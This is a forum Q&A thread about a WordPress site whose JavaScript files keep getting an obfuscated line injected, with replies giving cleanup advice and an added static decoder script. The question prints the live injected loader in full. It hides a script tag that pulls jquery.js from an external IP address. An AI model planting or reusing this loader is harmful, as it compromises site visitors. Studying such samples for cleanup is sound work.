
I have a theme-based WordPress website, but for the past few days the website plugins have not been working. The reason I found is that the ".js" files are being injected with the following malicious code:

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));

Steps taken to avoid it:

  • Restricted permissions to write a file.
  • Blocked FTP from being accessed by any IP other than mine.
  • Tried removing the code from the entire website.
  • Uploaded the backup files. But still, somehow, the code keeps getting injected into nearly all JavaScript files.
Daljeet Dhaliwal
  • You probably have a vulnerable plugin. – SLaks Oct 24 '17 at 15:24
  • Your backup might be infected as well. Look at the access log and look at any and all POST requests; that'll often produce an idea. – janh Oct 24 '17 at 15:35
  • Keep in mind an attack of this sort usually injects several backdoors.... If you do not have a valid backup, you will need to comb through your files for blobs of PHP, JS and foreign content. You will also need to look in the database for foreign content. It usually is very simple to spot, but long to find. It's tedious to say the least. After that, make sure your permissions are set to minimum; https://www.smashingmagazine.com/2014/05/proper-wordpress-filesystem-permissions-ownerships/ is a very thorough explanation of WordPress permissions (a bit on the overkill explanations, yes) – Ralph Thomas Hopper Oct 24 '17 at 15:43
  • Once the site is back clean, I suggest you get Cloudflare. They have safeguards specifically designed for WordPress... and keep your WP and plugins up to date. If you are running low-maintenance plugins or deprecated ones, find alternatives; it's not worth the hassle – Ralph Thomas Hopper Oct 24 '17 at 15:45
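To see what the injected line in the question actually does without running it, here is an added Node.js script (not from the question or any answer) that statically decodes the hex-escaped string table, resolves the `_0xaae8[N]` references, and applies the split/reverse/join step by hand so the URL handed to document.write() becomes readable. The sample is copied from the question; everything else is the example's own code.

```javascript
// Added example (not from the question or answers): a static decoder for the
// "_0x..." string-table obfuscation seen in the injected line. The sample is
// never evaluated; the payload is recovered purely by string processing.

// The injected line, copied from the question. String.raw keeps the "\x.."
// escapes as literal text so the regexes below see them unexpanded.
const SAMPLE = [
  String.raw`var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65",`,
  String.raw`"\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C",`,
  String.raw`"\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));`,
].join('');

// Expand \xHH escapes inside one quoted literal.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Pull out the string table:  var <name>=["...","..."];
function extractStringTable(src) {
  const m = src.match(/var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\];/i);
  if (!m) throw new Error('no obfuscated string table found');
  const strings = [...m[2].matchAll(/"((?:\\x[0-9a-fA-F]{2}|[^"\\])*)"/g)]
    .map(x => decodeHexEscapes(x[1]));
  return { name: m[1], strings, rest: src.slice(m[0].length) };
}

// Replace every <name>[N] with its decoded literal so the call chain reads plainly.
function resolveReferences(name, strings, code) {
  const ref = new RegExp(name + '\\[(\\d+)\\]', 'g');
  return code.replace(ref, (_, i) => JSON.stringify(strings[Number(i)]));
}

// The snippet calls split("").reverse().join("") on one table entry before
// document.write(); apply that reversal ourselves instead of executing it.
function recoverPayload(src) {
  const { name, strings, rest } = extractStringTable(src);
  const readable = resolveReferences(name, strings, rest);
  const reversed = strings.find(s => s.startsWith('>') && s.endsWith('<'));
  const payload = reversed ? [...reversed].reverse().join('') : null;
  return { readable, payload };
}

const result = recoverPayload(SAMPLE);
console.log(result.readable);
console.log('document.write() argument:', result.payload);
```

The decoded argument is a script tag pointing at an external jquery.js; that host is what to look for in the access log and in any outbound references left in the database.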

2 Answers


You have to find the file "db.php" and remove the infected code. At the same time you have to delete all infected code in the ".js" files. https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection


Right off, I think your backup may be corrupt. I don't know if it pre-dates your infection, but it is something to check. Also, try disabling/deleting plugins -- one could be vulnerable or infected. Look at the db.php and your .js files for infected code and remove it.

If your backup is bad, you'll have to go through all the code to find the bad bits and remove them. Or, if you can take the time and have clean source content, you could wipe the whole thing out and start over. It's a horrible thought, but sometimes that's the fix.

Gaby Weiss